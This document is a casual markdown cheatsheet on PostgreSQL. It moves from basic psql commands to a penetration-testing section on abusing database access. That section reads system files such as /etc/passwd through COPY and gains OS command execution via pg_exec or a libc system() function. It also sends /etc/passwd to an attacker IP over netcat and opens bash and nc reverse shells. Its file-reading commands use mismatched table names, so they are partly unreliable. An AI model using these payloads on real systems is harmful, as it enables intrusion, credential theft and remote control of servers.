# Basic usage of postgres

Basically a quick cheatsheet.


## Logging in

`psql -U username`

logging in without a username will default to the one you're using

postgres account doesn't have a password by default, so some configurations you can just log in with `psql -U postgres` and that's usually good enough

if psql is not available, double check to see if it's in /usr/local/pgsql/bin, cause it might just be hanging out

## get version

`SELECT version();`


## exit

`\q` will quit you out of psql


## List databases

to list a database you'll have to use postgres' goofy syntax

`\l` to list databases

### What's normal

Postgres servers will usually have some default databases: tempalte0, template1, and postgres.  Postgres is the database you connect to first before creating any other databases

Don't edit the templates, they're used to make new databases, and they'll copy over anything you put in them.

## connect to a database

`\c <dbname>`

## list tables

`\dt` will list the tables

You'll see 'No relations found' if there aren't any

## list users

`\du` will list all the users

postgres should be there


## read files

`select pg_read_file('PG_VERSION');`

will read files in the current working directory or below. You're limited though, that likely means you won't be able to read /etc/passwd or whatever juicy loot you're going after.

However, there is a solution

you can read a file by stuffing it inside a table

`create table loot (data TEXT);`
`copy lot from '/etc/passwd';`
`select * from docs;`


# pgexec

we can execute commands on the operation system with pg_exec

get it here: https://raw.githubusercontent.com/dionach/pgexec/master/pg_exec.c

compile it as pg_exec.so with `gcc pg_exec.c -o pg_exec.so` and find a way to move it over

if that doesn't work...

if it's before v8.1 you can use this method to execute system commands:

`CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;`
`SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');`

if not, you can try to compile pg_exec and use that

first, install postgres for the version you've found.  if it's 9.6.3, do this

`apt install postgresql postgresql-server-dev-9.6`

if that doesn't work, and it didn't for me, you can find precompiled libraries here: https://github.com/dionach/pgexec/tree/master/libraries

upload, and use with:

`CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;`
`SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');`
or set up a netcat reverse shell
`SELECT sys('nc <attackerip> <attackerport> -e /bin/bash');`

provided you don't bungle this and accidently download pg_exec.so as an html file like I did, this will probably work if nothing else did





